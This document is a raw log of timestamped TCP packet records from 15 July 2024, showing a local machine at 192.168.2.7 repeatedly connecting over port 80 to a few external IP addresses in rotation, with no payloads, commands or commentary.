Jul 15, 2024 12:44:58.665235043 CEST	80	54533	77.238.224.56	192.168.2.7
Jul 15, 2024 12:44:58.665349007 CEST	54533	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:58.665467978 CEST	54533	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:58.666743040 CEST	54535	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:58.670419931 CEST	80	54533	77.238.224.56	192.168.2.7
Jul 15, 2024 12:44:58.671612024 CEST	80	54535	77.238.229.63	192.168.2.7
Jul 15, 2024 12:44:58.671689034 CEST	54535	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:58.672132969 CEST	54535	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:58.677639961 CEST	80	54535	77.238.229.63	192.168.2.7
Jul 15, 2024 12:44:58.700687885 CEST	80	54534	77.238.224.56	192.168.2.7
Jul 15, 2024 12:44:58.700808048 CEST	54534	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:58.701035976 CEST	54534	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:58.701642990 CEST	54536	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:58.705806971 CEST	80	54534	77.238.224.56	192.168.2.7
Jul 15, 2024 12:44:58.706409931 CEST	80	54536	77.238.229.63	192.168.2.7
Jul 15, 2024 12:44:58.706501961 CEST	54536	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:58.707135916 CEST	54536	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:58.712037086 CEST	80	54536	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:00.266562939 CEST	80	54535	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:00.266676903 CEST	54535	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:00.266982079 CEST	54535	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:00.267927885 CEST	54537	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:00.271766901 CEST	80	54535	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:00.272917986 CEST	80	54537	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:00.273037910 CEST	54537	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:00.274965048 CEST	54537	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:00.280181885 CEST	80	54537	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:00.339387894 CEST	80	54536	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:00.339499950 CEST	54536	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:00.339590073 CEST	54536	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:00.340501070 CEST	54538	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:00.344530106 CEST	80	54536	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:00.346993923 CEST	80	54538	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:00.347080946 CEST	54538	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:00.347341061 CEST	54538	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:00.354091883 CEST	80	54538	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:00.870381117 CEST	80	54537	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:00.870685101 CEST	54537	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:00.875874996 CEST	80	54537	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:00.875958920 CEST	54537	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:00.979316950 CEST	80	54538	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:00.993978024 CEST	54538	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:00.999519110 CEST	80	54538	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:00.999598980 CEST	54538	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:01.091599941 CEST	54539	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:45:01.097021103 CEST	80	54539	195.2.70.38	192.168.2.7
Jul 15, 2024 12:45:01.097105026 CEST	54539	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:45:01.099924088 CEST	54539	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:45:01.105153084 CEST	80	54539	195.2.70.38	192.168.2.7
Jul 15, 2024 12:45:02.848088980 CEST	80	54539	195.2.70.38	192.168.2.7
Jul 15, 2024 12:45:02.848351002 CEST	54539	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:45:02.848448038 CEST	54539	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:45:02.850323915 CEST	54540	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:45:02.853379965 CEST	80	54539	195.2.70.38	192.168.2.7
Jul 15, 2024 12:45:02.855200052 CEST	80	54540	91.142.74.28	192.168.2.7
Jul 15, 2024 12:45:02.855335951 CEST	54540	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:45:02.856184006 CEST	54540	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:45:02.861042976 CEST	80	54540	91.142.74.28	192.168.2.7
Jul 15, 2024 12:45:04.594496012 CEST	80	54540	91.142.74.28	192.168.2.7
Jul 15, 2024 12:45:04.594562054 CEST	54540	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:45:04.594619036 CEST	54540	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:45:04.595400095 CEST	54541	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:04.601285934 CEST	80	54540	91.142.74.28	192.168.2.7
Jul 15, 2024 12:45:04.601298094 CEST	80	54541	77.238.224.56	192.168.2.7
Jul 15, 2024 12:45:04.601392031 CEST	54541	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:04.601672888 CEST	54541	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:04.606657028 CEST	80	54541	77.238.224.56	192.168.2.7
Jul 15, 2024 12:45:06.243933916 CEST	80	54541	77.238.224.56	192.168.2.7
Jul 15, 2024 12:45:06.243995905 CEST	54541	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:06.244107008 CEST	54541	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:06.248980999 CEST	54542	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:06.477283955 CEST	80	54541	77.238.224.56	192.168.2.7
Jul 15, 2024 12:45:06.477417946 CEST	54541	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:06.478332043 CEST	80	54541	77.238.224.56	192.168.2.7
Jul 15, 2024 12:45:06.478349924 CEST	80	54542	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:06.478439093 CEST	54542	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:06.478851080 CEST	54542	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:06.483628035 CEST	80	54542	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:08.064105988 CEST	80	54542	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:08.064187050 CEST	54542	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:08.064291000 CEST	54542	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:08.065177917 CEST	54543	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:08.069057941 CEST	80	54542	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:08.070036888 CEST	80	54543	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:08.070125103 CEST	54543	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:08.070478916 CEST	54543	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:08.075588942 CEST	80	54543	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:08.740403891 CEST	80	54543	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:08.740843058 CEST	54543	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:08.746104002 CEST	80	54543	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:08.746181011 CEST	54543	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:30.869700909 CEST	54544	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:45:30.978513956 CEST	80	54544	195.2.70.38	192.168.2.7
Jul 15, 2024 12:45:30.978688955 CEST	54544	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:45:30.979150057 CEST	54544	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:45:30.984009027 CEST	80	54544	195.2.70.38	192.168.2.7
Jul 15, 2024 12:45:30.996108055 CEST	54545	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:45:31.000972986 CEST	80	54545	195.2.70.38	192.168.2.7
Jul 15, 2024 12:45:31.001084089 CEST	54545	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:45:31.001327991 CEST	54545	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:45:31.006128073 CEST	80	54545	195.2.70.38	192.168.2.7
Jul 15, 2024 12:45:32.723543882 CEST	80	54544	195.2.70.38	192.168.2.7
Jul 15, 2024 12:45:32.723777056 CEST	54544	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:45:32.724102020 CEST	54544	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:45:32.725092888 CEST	54546	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:45:32.728873968 CEST	80	54544	195.2.70.38	192.168.2.7
Jul 15, 2024 12:45:32.730015993 CEST	80	54546	91.142.74.28	192.168.2.7
Jul 15, 2024 12:45:32.730135918 CEST	54546	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:45:32.730792046 CEST	54546	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:45:32.736044884 CEST	80	54546	91.142.74.28	192.168.2.7
Jul 15, 2024 12:45:32.736342907 CEST	80	54545	195.2.70.38	192.168.2.7
Jul 15, 2024 12:45:32.736428022 CEST	54545	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:45:32.736764908 CEST	54545	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:45:32.738085985 CEST	54547	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:45:32.741646051 CEST	80	54545	195.2.70.38	192.168.2.7
Jul 15, 2024 12:45:32.743087053 CEST	80	54547	91.142.74.28	192.168.2.7
Jul 15, 2024 12:45:32.743240118 CEST	54547	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:45:32.743575096 CEST	54547	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:45:32.748397112 CEST	80	54547	91.142.74.28	192.168.2.7
Jul 15, 2024 12:45:34.486186981 CEST	80	54547	91.142.74.28	192.168.2.7
Jul 15, 2024 12:45:34.486417055 CEST	54547	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:45:34.486504078 CEST	54547	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:45:34.487474918 CEST	54548	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:34.487914085 CEST	80	54546	91.142.74.28	192.168.2.7
Jul 15, 2024 12:45:34.487979889 CEST	54546	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:45:34.488034010 CEST	54546	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:45:34.488732100 CEST	54549	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:34.491348982 CEST	80	54547	91.142.74.28	192.168.2.7
Jul 15, 2024 12:45:34.492358923 CEST	80	54548	77.238.224.56	192.168.2.7
Jul 15, 2024 12:45:34.492425919 CEST	54548	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:34.492659092 CEST	54548	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:34.493036032 CEST	80	54546	91.142.74.28	192.168.2.7
Jul 15, 2024 12:45:34.493570089 CEST	80	54549	77.238.224.56	192.168.2.7
Jul 15, 2024 12:45:34.493627071 CEST	54549	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:34.493954897 CEST	54549	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:34.497569084 CEST	80	54548	77.238.224.56	192.168.2.7
Jul 15, 2024 12:45:34.498905897 CEST	80	54549	77.238.224.56	192.168.2.7
Jul 15, 2024 12:45:36.116947889 CEST	80	54548	77.238.224.56	192.168.2.7
Jul 15, 2024 12:45:36.117038965 CEST	54548	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:36.117419004 CEST	80	54549	77.238.224.56	192.168.2.7
Jul 15, 2024 12:45:36.117476940 CEST	54549	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:36.163561106 CEST	54548	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:36.163666010 CEST	54549	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:36.165216923 CEST	54550	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:36.165405989 CEST	54551	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:36.169434071 CEST	80	54548	77.238.224.56	192.168.2.7
Jul 15, 2024 12:45:36.169750929 CEST	80	54549	77.238.224.56	192.168.2.7
Jul 15, 2024 12:45:36.171416044 CEST	80	54550	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:36.171475887 CEST	54550	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:36.172178030 CEST	54550	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:36.172195911 CEST	80	54551	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:36.172250986 CEST	54551	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:36.172923088 CEST	54551	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:36.176928043 CEST	80	54550	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:36.177663088 CEST	80	54551	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:37.803905964 CEST	80	54551	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:37.803927898 CEST	80	54550	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:37.804059029 CEST	54550	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:37.804059029 CEST	54551	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:37.804114103 CEST	54551	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:37.804204941 CEST	54550	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:37.805486917 CEST	54552	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:37.805687904 CEST	54553	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:38.028376102 CEST	80	54550	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:38.028394938 CEST	80	54551	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:38.028438091 CEST	54550	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:38.030366898 CEST	80	54551	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:38.030400038 CEST	54551	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:38.030431032 CEST	80	54550	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:38.030442953 CEST	80	54552	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:38.030452967 CEST	80	54553	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:38.030534029 CEST	54552	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:38.030966997 CEST	54552	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:38.030972004 CEST	54553	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:38.030999899 CEST	54553	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:38.035789967 CEST	80	54552	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:38.035800934 CEST	80	54553	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:38.639513016 CEST	80	54552	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:38.647656918 CEST	54552	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:38.648513079 CEST	80	54553	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:38.651751995 CEST	54553	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:38.653744936 CEST	80	54552	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:38.653830051 CEST	54552	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:38.657660007 CEST	80	54553	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:38.657725096 CEST	54553	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:38.738394976 CEST	54554	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:45:38.743343115 CEST	80	54554	195.2.70.38	192.168.2.7
Jul 15, 2024 12:45:38.743422031 CEST	54554	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:45:38.791310072 CEST	54554	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:45:38.796210051 CEST	80	54554	195.2.70.38	192.168.2.7
Jul 15, 2024 12:45:40.489691973 CEST	80	54554	195.2.70.38	192.168.2.7
Jul 15, 2024 12:45:40.489789009 CEST	54554	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:45:40.489891052 CEST	54554	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:45:40.490804911 CEST	54555	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:45:40.500206947 CEST	80	54554	195.2.70.38	192.168.2.7
Jul 15, 2024 12:45:40.500359058 CEST	80	54555	91.142.74.28	192.168.2.7
Jul 15, 2024 12:45:40.500433922 CEST	54555	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:45:40.500961065 CEST	54555	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:45:40.506036043 CEST	80	54555	91.142.74.28	192.168.2.7
Jul 15, 2024 12:45:42.234618902 CEST	80	54555	91.142.74.28	192.168.2.7
Jul 15, 2024 12:45:42.234781027 CEST	54555	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:45:42.234883070 CEST	54555	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:45:42.236037016 CEST	54556	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:42.239715099 CEST	80	54555	91.142.74.28	192.168.2.7
Jul 15, 2024 12:45:42.240921021 CEST	80	54556	77.238.224.56	192.168.2.7
Jul 15, 2024 12:45:42.241013050 CEST	54556	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:42.241359949 CEST	54556	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:42.246232033 CEST	80	54556	77.238.224.56	192.168.2.7
Jul 15, 2024 12:45:43.849781036 CEST	80	54556	77.238.224.56	192.168.2.7
Jul 15, 2024 12:45:43.849899054 CEST	54556	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:43.849983931 CEST	54556	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:45:43.850886106 CEST	54557	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:43.854862928 CEST	80	54556	77.238.224.56	192.168.2.7
Jul 15, 2024 12:45:43.855690956 CEST	80	54557	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:43.855770111 CEST	54557	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:43.855981112 CEST	54557	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:43.860771894 CEST	80	54557	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:45.492119074 CEST	80	54557	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:45.492196083 CEST	54557	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:45.492279053 CEST	54557	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:45:45.493082047 CEST	54558	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:45.497268915 CEST	80	54557	77.238.229.63	192.168.2.7
Jul 15, 2024 12:45:45.497946978 CEST	80	54558	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:45.498011112 CEST	54558	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:45.498349905 CEST	54558	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:45.503772974 CEST	80	54558	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:46.112219095 CEST	80	54558	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:46.112509966 CEST	54558	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:45:46.117595911 CEST	80	54558	77.238.250.123	192.168.2.7
Jul 15, 2024 12:45:46.117674112 CEST	54558	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:46:08.647424936 CEST	54559	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:46:08.647681952 CEST	54560	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:46:08.652530909 CEST	80	54559	195.2.70.38	192.168.2.7
Jul 15, 2024 12:46:08.652623892 CEST	80	54560	195.2.70.38	192.168.2.7
Jul 15, 2024 12:46:08.652645111 CEST	54559	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:46:08.652690887 CEST	54560	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:46:08.652998924 CEST	54560	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:46:08.653048992 CEST	54559	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:46:08.657823086 CEST	80	54560	195.2.70.38	192.168.2.7
Jul 15, 2024 12:46:08.658067942 CEST	80	54559	195.2.70.38	192.168.2.7
Jul 15, 2024 12:46:10.392925024 CEST	80	54559	195.2.70.38	192.168.2.7
Jul 15, 2024 12:46:10.393141031 CEST	54559	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:46:10.393250942 CEST	54559	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:46:10.393299103 CEST	80	54560	195.2.70.38	192.168.2.7
Jul 15, 2024 12:46:10.393382072 CEST	54560	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:46:10.393481016 CEST	54560	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:46:10.394095898 CEST	54561	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:46:10.394263029 CEST	54562	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:46:10.398144007 CEST	80	54559	195.2.70.38	192.168.2.7
Jul 15, 2024 12:46:10.398390055 CEST	80	54560	195.2.70.38	192.168.2.7
Jul 15, 2024 12:46:10.399108887 CEST	80	54561	91.142.74.28	192.168.2.7
Jul 15, 2024 12:46:10.399139881 CEST	80	54562	91.142.74.28	192.168.2.7
Jul 15, 2024 12:46:10.399205923 CEST	54561	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:46:10.399246931 CEST	54562	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:46:10.399555922 CEST	54562	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:46:10.399615049 CEST	54561	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:46:10.404393911 CEST	80	54562	91.142.74.28	192.168.2.7
Jul 15, 2024 12:46:10.404570103 CEST	80	54561	91.142.74.28	192.168.2.7
Jul 15, 2024 12:46:12.143273115 CEST	80	54562	91.142.74.28	192.168.2.7
Jul 15, 2024 12:46:12.143378973 CEST	54562	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:46:12.143471003 CEST	54562	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:46:12.144280910 CEST	54563	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:46:12.146270037 CEST	80	54561	91.142.74.28	192.168.2.7
Jul 15, 2024 12:46:12.146357059 CEST	54561	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:46:12.146421909 CEST	54561	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:46:12.147124052 CEST	54564	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:46:12.148443937 CEST	80	54562	91.142.74.28	192.168.2.7
Jul 15, 2024 12:46:12.149142027 CEST	80	54563	77.238.224.56	192.168.2.7
Jul 15, 2024 12:46:12.149221897 CEST	54563	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:46:12.149622917 CEST	54563	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:46:12.151217937 CEST	80	54561	91.142.74.28	192.168.2.7
Jul 15, 2024 12:46:12.152126074 CEST	80	54564	77.238.224.56	192.168.2.7
Jul 15, 2024 12:46:12.152203083 CEST	54564	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:46:12.154475927 CEST	80	54563	77.238.224.56	192.168.2.7
Jul 15, 2024 12:46:12.154911995 CEST	54564	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:46:12.159756899 CEST	80	54564	77.238.224.56	192.168.2.7
Jul 15, 2024 12:46:13.846482038 CEST	80	54564	77.238.224.56	192.168.2.7
Jul 15, 2024 12:46:13.846580982 CEST	54564	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:46:13.846704006 CEST	54564	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:46:13.847249031 CEST	80	54563	77.238.224.56	192.168.2.7
Jul 15, 2024 12:46:13.847332001 CEST	54563	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:46:13.847559929 CEST	54563	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:46:13.847950935 CEST	54565	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:46:13.849416018 CEST	54566	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:46:13.851572990 CEST	80	54564	77.238.224.56	192.168.2.7
Jul 15, 2024 12:46:13.852432966 CEST	80	54563	77.238.224.56	192.168.2.7
Jul 15, 2024 12:46:13.852869034 CEST	80	54565	77.238.229.63	192.168.2.7
Jul 15, 2024 12:46:13.852942944 CEST	54565	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:46:13.853741884 CEST	54565	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:46:13.855130911 CEST	80	54566	77.238.229.63	192.168.2.7
Jul 15, 2024 12:46:13.855199099 CEST	54566	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:46:13.855485916 CEST	54566	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:46:13.858812094 CEST	80	54565	77.238.229.63	192.168.2.7
Jul 15, 2024 12:46:13.860229969 CEST	80	54566	77.238.229.63	192.168.2.7
Jul 15, 2024 12:46:15.475359917 CEST	80	54566	77.238.229.63	192.168.2.7
Jul 15, 2024 12:46:15.475517035 CEST	54566	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:46:15.475570917 CEST	54566	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:46:15.476489067 CEST	54567	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:46:15.477109909 CEST	80	54565	77.238.229.63	192.168.2.7
Jul 15, 2024 12:46:15.477185965 CEST	54565	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:46:15.477380991 CEST	54565	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:46:15.478105068 CEST	54568	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:46:15.480448008 CEST	80	54566	77.238.229.63	192.168.2.7
Jul 15, 2024 12:46:15.481369972 CEST	80	54567	77.238.250.123	192.168.2.7
Jul 15, 2024 12:46:15.481486082 CEST	54567	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:46:15.481992960 CEST	54567	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:46:15.482168913 CEST	80	54565	77.238.229.63	192.168.2.7
Jul 15, 2024 12:46:15.483006954 CEST	80	54568	77.238.250.123	192.168.2.7
Jul 15, 2024 12:46:15.483084917 CEST	54568	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:46:15.483285904 CEST	54568	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:46:15.486809015 CEST	80	54567	77.238.250.123	192.168.2.7
Jul 15, 2024 12:46:15.488071918 CEST	80	54568	77.238.250.123	192.168.2.7
Jul 15, 2024 12:46:16.086112022 CEST	80	54567	77.238.250.123	192.168.2.7
Jul 15, 2024 12:46:16.086481094 CEST	54567	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:46:16.087603092 CEST	80	54568	77.238.250.123	192.168.2.7
Jul 15, 2024 12:46:16.087933064 CEST	54568	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:46:16.091902971 CEST	80	54567	77.238.250.123	192.168.2.7
Jul 15, 2024 12:46:16.092061043 CEST	54567	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:46:16.092852116 CEST	80	54568	77.238.250.123	192.168.2.7
Jul 15, 2024 12:46:16.092911005 CEST	54568	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:46:16.120743036 CEST	54569	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:46:16.125708103 CEST	80	54569	195.2.70.38	192.168.2.7
Jul 15, 2024 12:46:16.125825882 CEST	54569	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:46:16.126537085 CEST	54569	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:46:16.131330967 CEST	80	54569	195.2.70.38	192.168.2.7
Jul 15, 2024 12:46:17.865345001 CEST	80	54569	195.2.70.38	192.168.2.7
Jul 15, 2024 12:46:17.865653992 CEST	54569	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:46:17.865881920 CEST	54569	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:46:17.868361950 CEST	54570	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:46:17.870757103 CEST	80	54569	195.2.70.38	192.168.2.7
Jul 15, 2024 12:46:17.873481989 CEST	80	54570	91.142.74.28	192.168.2.7
Jul 15, 2024 12:46:17.873600960 CEST	54570	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:46:17.874402046 CEST	54570	80	192.168.2.7	91.142.74.28
